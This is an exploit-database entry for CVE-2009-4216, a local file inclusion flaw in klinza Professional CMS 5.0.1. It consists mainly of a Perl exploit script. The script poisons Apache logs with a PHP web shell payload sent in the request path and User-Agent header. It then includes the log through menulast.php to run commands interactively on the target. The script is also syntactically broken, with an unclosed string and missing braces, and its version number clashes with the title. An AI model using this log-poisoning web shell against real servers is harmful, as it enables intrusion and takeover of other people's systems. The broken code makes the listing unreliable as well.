klinza Professional CMS 5.0.1 - 'menulast.php' Local File Inclusion

Related Vulnerabilities: CVE-2009-4216  
Publish Date: 24 Nov 2009
Author: klinza
                source: http://www.securityfocus.com/bid/37127/info

The 'klinza professional cms' project is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied data.

Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible.

This issue affects 'klinza professional cms 5.0.1' and prior versions. 

#klinza cms <= 5.0.1 Local File Include Exploit
#Discovered by cr4wl3r
#Contact : cr4wl3r[4t]linuxmail[dot]org
use IO::Socket;
use LWP::Simple;

if (@ARGV < 3){
print "
|                 klinza <= 0.0.1 Local File Include Exploit
|               Usage: klinza.pl [target] [path] [apachepath]
|           Example: klinza.pl target.com /LANG/ ../logs/error.log
|                            coded by : cr4wl3r


print "Injecting code in log files...\n";
$CODE="<?php ob_clean();system(\$HTTP_COOKIE_VARS[cmd]);die;?>";
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "Connect Failed.\n\n";
print $socket "GET ".$path.$CODE." HTTP/1.1\r\n";
print $socket "User-Agent: ".$CODE."\r\n";
print $socket "Host: ".$host."\r\n";
print $socket "Connection: close\r\n\r\n";
print "Write END to exit!\n";
print "IF not working try another apache path\n\n";

print "[shell] ";$cmd = <STDIN>;

while($cmd !~ "END") {
    $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "Connect Failed.\n\n";
    print $socket "GET ".$path."/funzioni/lib/menulast.php?LANG=".$apache[$apachepath]."&cmd=$cmd HTTP/1.1\r\n";
    print $socket "Host: ".$host."\r\n";
    print $socket "Accept: */*\r\n";
    print $socket "Connection: close\r\n\n";

    while ($raspuns = <$socket>)
        print $raspuns;

    print "[shell] ";
    $cmd = <STDIN>;